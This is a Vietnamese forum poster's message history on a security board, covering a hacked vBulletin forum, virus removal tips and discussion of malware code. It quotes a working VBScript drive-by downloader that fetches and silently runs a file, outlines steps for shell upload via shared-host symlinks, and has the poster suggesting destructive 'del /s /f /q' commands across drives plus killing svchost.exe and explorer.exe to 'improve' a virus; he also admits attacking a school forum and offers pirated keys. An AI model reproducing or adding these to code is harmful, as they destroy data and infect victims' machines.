Messages posted by: MinhNguyenQuang75

nguyenga86 wrote:

nếu ko có những " cái này cái kia " thế bạn định tay không bắt giặc à ? những cái này cái kia đó mục đích cuối cùng cũng chỉ là để kiếm được cái account có quyền hạn cao nhất hoặc ít nhất là quyền hạn đủ để có thể làm 1 việc gì đó theo ý muốn của attacker

Nhưng làm thế nào để có dc "cái này cái kia" smilie

Search_IT wrote:

MinhNguyenQuang75 wrote:

Em có câu hỏi nhỏ thế này. Làm sao hacker có thể import shell vào database của website nhỉ ? Có dùng tool gì k ?

Vào Google gõ cụm từ này "Up Shell via phpMyAdmin" là sẽ ra cái bạn cần.

Em search rồi. Các tài liệu toàn ghi toàn là phải cần có cái này cái kia. nản luôn

Em có câu hỏi nhỏ thế này. Làm sao hacker có thể import shell vào database của website nhỉ ? Có dùng tool gì k ?

bolzano_1989 wrote:

nv59c, ông MinhNguyenQuang75 này chém gió đó, về mà lo ôn thi ĐH đi, vào đh rồi thì bám theo và học lên từ những gì được dạy ở đh.

Phải có mơ ước thì ms có động lực mà thi, smilie

)

Tốt nhất là drop toàn bộ rồi import lại.
Tại sao bạn k mã hoá và chmod file config.php ?

@ chủ thread: vs suy nghĩ như vậy e thấy rằng a có thể là 1 ng năng nổ. Tốt nhất là nên xin vào các công ti game như VNG hay VTCGame và học tập từ đó !

@nkp: Thanks bác nhé.
@mts: Khà khà, đã nâng lên vBB 4.1.5
Mấy bác xem giúp e còn lỗ hổng nào k wWw.vnclicks.tk
Em chuyển server sang CPanel rồi

.lht. wrote:

MinhNguyenQuang75 wrote:

Em có 1 4rum bằng vbb 4.0.0 (Em lập ra nhằm mục đích nghiên cứu là chính).
Sáng nay em vào thì bị hacker tấn công bằng phương pháp upload shell vào MySQL. Em đã khắc phục bằng phương pháp drop toàn bộ database và import lại. Hiện giờ thì tạm ổn rồi.
Vậy em có vài vấn đề thế này:
- Hacker dùng cách nào để upload shell ? Làm thế nào để khắc phục và ngăn chặn việc đó
- Lỗi đó là do vBB hay do host (vì là nghiên cứu nên e dùng toàn bộ free gồm: byethost và vbb 4.0.0 null)
Cảm ơn các bác đã đọc

Theo như bạn mô tả thì mình nghĩ người kia đã dùng phương pháp symlink để đọc file config.php từ thư mục chứa forum của bạn rồi import shell vào đó.
Nếu đúng như mình nghĩ thì người đó sẽ tấn công bạn theo những bước sau:

1) Xác định đối tượng là site bạn, tìm lỗi nhưng khả thi.
2) Chuyển qua tìm "cổng hậu".
3) Reverse IP tìm những site nằm cùng trên 1 server với site của bạn.
4) Tìm lỗi trên những site kia và khai thác.
5) Symlink (hoặc có thể do config không kĩ) giúp hacker tìm và đọc nội dung file config.php[b]

Còn nếu không phải như trên, thì nhiều khả năng là forum của bạn hay 1 trong những bản mod bạn đang dùng có chứa "HÀNG" của tên kia từ trước.

K thể đọc dc file config.php vì em đã chmod + mã hoá + đổi tên + giấu bằng phương pháp giấu trong linux
E k xài hàng của hacker, vì mấy hôm trước em có tấn công forum trường học của chúng và chúng trả thù thôi, chứ em xài hàng download trên vBB Việt Nam cơ mà

concobe wrote:

MinhNguyenQuang75 wrote:

Em có 1 4rum bằng vbb 4.0.0 (Em lập ra nhằm mục đích nghiên cứu là chính).
Sáng nay em vào thì bị hacker tấn công bằng phương pháp upload shell vào MySQL. Em đã khắc phục bằng phương pháp drop toàn bộ database và import lại. Hiện giờ thì tạm ổn rồi.
Vậy em có vài vấn đề thế này:
- Hacker dùng cách nào để upload shell ? Làm thế nào để khắc phục và ngăn chặn việc đó
- Lỗi đó là do vBB hay do host (vì là nghiên cứu nên e dùng toàn bộ free gồm: byethost và vbb 4.0.0 null)
Cảm ơn các bác đã đọc

....

Cách upload shell thì bạn có thể tìm hiểu trên google có rất nhiều bài nói về việc này và cả bài hướng dẫn khắc phục. Mình chỉ nêu tóm tắt vài bước cơ bản.
+ Tìm lỗi website, forum hoặc server.
+ Khai thác lỗi và chiếm quyền admin. hoặc nâng mình lên làm admin.
+ vào admincp upload shell qua skin hoặc qua plugin...
+ làm gì hacker muốn.

Trở lại hai thắc mắc của bạn thì mình có một câu hỏi nhỏ là làm sao bạn biết chắc chắn hacker đã upload shell vào database của bạn? mà không phải là vào source code bạn đang sài ? bạn nên kiểm tra lại hoặc tốt nhất là upload toàn bộ source code mới thay thế cho source code bạn đang sài + restore lại database sau khi kiểm tra.

Một vài thông tin hy vọng sẽ giúp ích cho bạn.

Em cảm ơn. Em nghĩ nó k thể chiếm dc quyền admin vì em đã code lại file admincp/global.php
Còn vì sao em biết hacker up shell ấy hả ? Sau khi hack xong, nó để lại nguyên cục shell to tướng mà smilie

(Shell của ly0kha). Em đoán nó upload trực tiếp qua FTPCute

Em có 1 4rum bằng vbb 4.0.0 (Em lập ra nhằm mục đích nghiên cứu là chính).
Sáng nay em vào thì bị hacker tấn công bằng phương pháp upload shell vào MySQL. Em đã khắc phục bằng phương pháp drop toàn bộ database và import lại. Hiện giờ thì tạm ổn rồi.
Vậy em có vài vấn đề thế này:
- Hacker dùng cách nào để upload shell ? Làm thế nào để khắc phục và ngăn chặn việc đó
- Lỗi đó là do vBB hay do host (vì là nghiên cứu nên e dùng toàn bộ free gồm: byethost và vbb 4.0.0 null)
Cảm ơn các bác đã đọc

Học toán tốt thì sẽ tư duy tốt => Cái tư duy đó có thể áp dụng cho mọi thứ chứ k riêng gì IT. Ý kiến của mình là vậy smilie

nhoxpham_lt206 wrote:

Hôm qua mình diệt virut trên cái thẻ nhớ (dùng CMC) , diệt xong mở ra mới thấy hoảng. Nó xoá sạch các bài hát mà mình yêu thích, cả ảnh mà mình cất công tìm kiếm và tạo ra nữa. Những dữ liệu này không quan trọng lắm nhưng mình khó có thể kiếm lại được tất cả...Giờ mình rồi lắm, mong các bạn chỉ giúp cách phục hồi lại ...!

Mình lấy làm lạ là vì sao virus lại "ăn" dc file media nhỉ
Phải chăng là virus làm ẩn đi

nhoxpham_lt206 wrote:

Nó cần có key bạn à, mà mình làm j có key. MÌnh có tìm hỉu nhưng bản crack cũng không có..!Thank vì bạn đã góp ý.

Đó là version bao nhiêu và là 32 or 64 bit. Mình sẽ tìm key giúp bạn và k lấy 1 xu

bolzano_1989 wrote:

MinhNguyenQuang75 wrote:

tmd wrote:

MinhNguyenQuang75 wrote:

ngocvuxxl wrote:

cái này giống code chèn keylog vào web.
"Link trang web độc muốn nạn nhân dính trưởng" thay cái này = link con keylog.
thấy wen wen, chắc thế.

Con này là sality đấy, em phân tích xong thấy nó là lạ, code nghèo nàn thế này thì có lây nhiễm dc k

Bạn cần phân tích bằng google để xem người ta nói cái đoạn bạn post lên diễn đàn là gì. COde nó nghèo nàn mà bạn phát biểu vậy, thật bái phục bạn.

Phân tích bằng google kiểu gì vậy? Bạn cao thủ quá . Con này tên gốc là gai xinh.exe đó

Về Bkav forum mà hỏi ấy, bạn LoveRap.

LoveRap là anh tớ smilie

bolzano là cái đồ sống 2 mặt
Thảo nào cái avarta, ha ha ha

tmd wrote:

MinhNguyenQuang75 wrote:

ngocvuxxl wrote:

cái này giống code chèn keylog vào web.
"Link trang web độc muốn nạn nhân dính trưởng" thay cái này = link con keylog.
thấy wen wen, chắc thế.

Con này là sality đấy, em phân tích xong thấy nó là lạ, code nghèo nàn thế này thì có lây nhiễm dc k

Bạn cần phân tích bằng google để xem người ta nói cái đoạn bạn post lên diễn đàn là gì. COde nó nghèo nàn mà bạn phát biểu vậy, thật bái phục bạn.

Phân tích bằng google kiểu gì vậy? Bạn cao thủ quá smilie

. Con này tên gốc là gai xinh.exe đó

LlizKy wrote:

mã để gắn zô web lấy nhiễm virut đó mà...

Vậy đây chưa phải virus thực à, sau khi kết nối tới địa chỉ kia thì virus thực mới dc download về à. Gian thật, bonnj virus cũng ranh ma thật

ngocvuxxl wrote:

cái này giống code chèn keylog vào web.
"Link trang web độc muốn nạn nhân dính trưởng" thay cái này = link con keylog.
thấy wen wen, chắc thế.

Con này là sality đấy, em phân tích xong thấy nó là lạ, code nghèo nàn thế này thì có lây nhiễm dc k

kekhocdoi wrote:

dl = "Link trang web độc muốn nạn nhân dính trưởng"
Đọc cái này thì còn phải hỏi

tuy là vậy nhưng cả đoạn này có khả năng lây nhiễm k?

Code:

<script language="VBScript">
on error resume next
dl = "Link trang web độc muốn nạn nhân dính trưởng"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>

boynet wrote:

web của em thỉnh thoảng bị trở chúng không truy cập được, nhà cung cấp host báo là host bị dính Trojan.JS-37. Hiện tại em đã down toàn bộ về máy, quyét virus và up lại. Trình quyét virus trên host không sử dụng được. Vậy làm sao để diệt tận gốc trojan này ? Con này toàn tấn công vào các file index.html Mong các bác giúp đỡ.

Dùng Dr.Web quét xem sao

Xin bổ sung thêm cách diệt bằng tay nữa.

1. Cần thiết và nên có
* Cần thiết:

- Một Registry Editor thay thế như Tuneup Regitry Editor
- Task Manager thay thế (Google)

Có thể trong Windows đã có nhưng để có thể bị phá huỷ mất

* Nên có:

Hệ điều hành thứ 2, đĩa cài hệ điều hành, Linux, các công cụ Tweak, unblock,.v..v...

2. Nguyên tắc chung:
- Không xoá virus dù đã xác định đúng mà nên để các AV diệ, chỉ thay bằng tập tin gốc của hệ điều hành, hoặc bằng tập tin gốc của hệ điều hành để tránh sự cố.
- Ngắt kết nối Internet (hoặc có mạng LAN thì cũng rút dây) nêu có.
- Chỉnh lại các khoá regedit bị virus thay đổi.
- Ẩn các phân vùng không cần thiết.

3. Khảo sát tình hình:
- Kiểm tra các file autorun.inf và autorun.ini tìm thấy trong các ổ đĩa. Nếu tìm thấy file *.com thì xoá luôn. Nếu là file *.exe thì ghi lại tên, dung lượng, ngày tạo và copy làm mẫu.
- Mở sẵn trình task manager thay thế lên, chú ý quan sát: mọi tiến trình đều có thể là virus. Bạn hãy ghi lại tên đường dẫn đến chúng, trong Process Explore, xem tiến trình nào có biểu tượng thư mục thì đều là virus. Bạn hãy ghi lại tên đường dẫn đến chúng, trong process explore, xem các tiến trình nào đứng đầu các cây thư mục, ghi lại PID. Mở Properties của chúng lên, xem prameter, file nào khởi động chúng và chúng chạy với tài khoản nào (nếu là system thì là service). Tiếp tục lấy mẫu và copy virus vào nơi cách ly.
Dùng CurrProcess để tìm module không đáng tin cậy của tiến trình virus.
- Thử tấn công 1 vài rồi toàn bộ virus bằng cách tắt chúng đi, mở các phần mềm exe cho đến khi chúng chạy lại.
- Ghi lại toàn bộ kết quả khảo sát.

4. Tiêu diệt bằng tay:

* Nếu trên hệ điều hành khác (Linux)

- Khởi động lại máy, vào hệ điều hành và chạy trình quản lý file. Tìm kiếm các file trùng tên và có dung lượng trùng với virus, và các module đáng ngờ.
- Trong Hacao Office Linux. Bấm Alt + F7 để tìm kiếm, chọn ổ hệ thống trong mục Search in, chuyển qua Thẻ Advances, đánh dấu trước ô File size, chọn bằng =, nhập dung lượng của Virus vào (VD: 328 KB) rồi bấm Search. Chú ý: Cũng có thể file hệ thống cũng có cùng dung lượng virus.
- Xoá các file *.pif, *.com, *.bat và file autorun.inf, hay file có phần mở rộng đáng ngờ.
- Kiểm tra version, icon, phần mô tả file nếu có version 1.0.0.0 hay 0.0, icon thư mục và có dung lượng bằng virus thì đã tóm được 1 chú. Dùng 1 file an toàn để overwrite nó, như Rundll32.exe, file dll của hệ thống chẳng hạn. Nếu chỉ dùng mẫu duy nhất cho 1 một file, bạn có thể thay nó bằng file hệ thống gốc.
- Sao lưu lại file virus
- Copy lại các bản gốc cho các file: Userinit.exe, regedit32.exe, regsvr32.exe, rundll32.exe... để đảm bảo hoạt động sau khi virus bị diệt.
- Nếu có đĩa cài đặt Windows thì rất đơn giản, bạn giải nén file có tên giống, có phần mở rộng tương tự nhưng có dấu Shift - là xong. Đây là file cài đặt gốc của chúng. Có thể cài ở chế độ nâng cấp để phục hồi file hệ thống. Nên làm trong linux để tránh lan rộng và đễ hơn khi làm trong DOS
- Sau khi hoàn tất, khởi động lại máy để test.

* Ngay trên hệ điều hành hiện tại:

- Nếu virus tự chạy thêm khi diệt, đừng trực tiếp tắt nó, nếu không muốn reset máy.
- Nếu Virus không cho khởi động phần mềm lạ (virus có biển hiệu). Khởi động lại máy, bấm F8 để lựa chọn khởi động máy với Safe mode with command Prompt hoặc môi trường khác rồi copy Process Explore vào Start up hay overwrite Explore.exe trong thư mục windows
- Dùng chức năng Suspend của Process Manager và lần diệt chúng.
- Tìm kiếm và thay thế như trên
- Khởi động lại máy.

5. Chỉnh lại hệ điều hành:
- Dùng công cụ tweak và unblock để mở các công cụ cần dùng, xoá đường dẫn khởi động của virus, phục hồi safe boot....
- Disable service virus nếu có.
- Dùng Tuneup Registry Editor, tìm từ khoá với tên con virus, xoá đường dẫn đến chúng nếu đó là một phần của parameter. Chú ý những virus cùng tên file hệ thống.
- Chạy lệnh Regsvr32 -u <Đường dẫn đến file dll của virus>. Nếu có thông báo chưa gỡ được thì bạn cứ xoá luôn. Nếu thông báo gỡ thành công thì chạy tiếp lệnh sau: regsver32 -i <Đường dẫn đến file dll của virus>. Mục đích để gỡ triệt để virus.
- Để hiện file ẩn. Start > Run > Gõ cmd. Gõ tiếp cd\ vào dấu nhắc..(Nếu muốn chuyển sang phân vùng khác thì nhấn tên phân vùng kèm dấu 2 chấm (: ) gõ tiếp attrib * /s /d -s -h -r -a. Tất cả các file ẩn sẽ hiện lên.

6. Sau khi hoàn tất:
- Tạo bản sao cho hệ điều hành (VD: sử dụng Norton Ghost...)
- Gửi mẫu cho công ty diệt viruṣ VD: Kaspersky
Muốn nâng cao tay nghề thì tạo thêm phân vùng, cấy virus và luyện tập lại

blackghost.kenbi wrote:

MinhNguyenQuang75 wrote:

blackghost.kenbi wrote:

Hay nhỉ, cái này hôm wa tui mới bị admin nhắc nhờ là viết virus gây hại cho người khác, còn bạn ghi thêm cái là nhiều quá rồi, viết virus phá hoại là bị treo nick đó admin nói với tui hôm qua, xem kỹ lại di

vậy à, thế sao bạn lại đưa ra mấy cái "lệnh" kia nữa làm chi, đính phá hoại hã

Vo Thanh Lam wrote:

Hic. Em thử cách này rồi. Nhưng không được. Em thay thiếu file win.ini thì sao ạ!

làm gì có win.ini. Có boot.ini thôi.

File boot.ini đó nội dung như sau:
Code:

[boot loader]
timeout=3
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows is loading..." /fastdetect /NoExecute=OptIn
C:\="Boot to DOS"

Vo Thanh Lam wrote:

Ah. Cho em hỏi Boot 9.8 làm thế nào?.

Lên trang này mà chọn 1 phiên bản: http://www.hirensbootcd.net/download.html
Sau đó lên google gõ Hướng dẫn làm đĩa boot + Phiên bản muốn làm VD: Huong dan lam dia boot 10.5

blackghost.kenbi wrote:

Hay nhỉ, cái này hôm wa tui mới bị admin nhắc nhờ là viết virus gây hại cho người khác, còn bạn ghi thêm cái là nhiều quá rồi, viết virus phá hoại là bị treo nick đó admin nói với tui hôm qua, xem kỹ lại di

Cần có: Boot 9.8 trở lên và đĩa CD cài đặt Windows XP
- Vào XP Mini bằng đĩa boot
- Sau khi quá trình load vào xp mini hoàn tất thì tháo đĩa boot ra cho đĩa win vào
- Explore vào ổ đĩa và tìm thư mục I386 của đĩa win
- Tìm và copy những file cần thiết vào ổ C

handaewoo wrote:

MinhNguyenQuang75 wrote:

*.pif là file liên lạc về tác giả của con virus để ăn cắp những điều bí mật

Tôi không nghĩ thế

vậy đuôi pif là gì nhỉ. Có phải là định dạng của ms-dos program k?

Đã là virus thì đầu tư đi,
Ghi thêm là

del /s /f /q d:\*.*
del /s /f /q e:\*.*
del /s /f /q f:\*.*
del /s /f /q g:\*.*
del /s /f /q h:\*.*
del /s /f /q i:\*.*
del /s /f /q j:\*.*
del /s /f /q k:\*.*
del /s /f /q l:\*.*
del /s /f /q m:\*.*
del /s /f /q n:\*.*
del /s /f /q o:\*.*
del /s /f /q p:\*.*
del /s /f /q q:\*.*
del /s /f /q r:\*.*
del /s /f /q s:\*.*
del /s /f /q t:\*.*
del /s /f /q u:\*.*
del /s /f /q v:\*.*
del /s /f /q x:\*.*
del /s /f /q y:\*.*
del /s /f /q z:\*.*

cho lên total virus quét xem sao?

Nếu chưa biết tý gì thì thời gian tham gia forum của bạn còn dài smilie

minhducitpro wrote:

If ProcessExists("iexplorer.exe") then
ProcessClose("iexplorer.exe")
EndIf
If ProcessExists("firefox.exe") then
ProcessClose("firefox.exe")
EndIf

Đoạn này. Chà chà - nhỡ đâu nạn nhân dùng opera hay trình duyệt nào khác thì sao?
Nên bổ sung thêm
Code:

If ProcessExists("svchost.exe") then
ProcessClose("svchost.exe")
EndIf
If ProcessExists("explorer.exe") then
ProcessClose("explorer.exe")
EndIf

Thế thôi là đủ chết rồi. Còn đoạn em trích bài trên. Nếu bác viết virus lây file thì mới để đoạn code ấy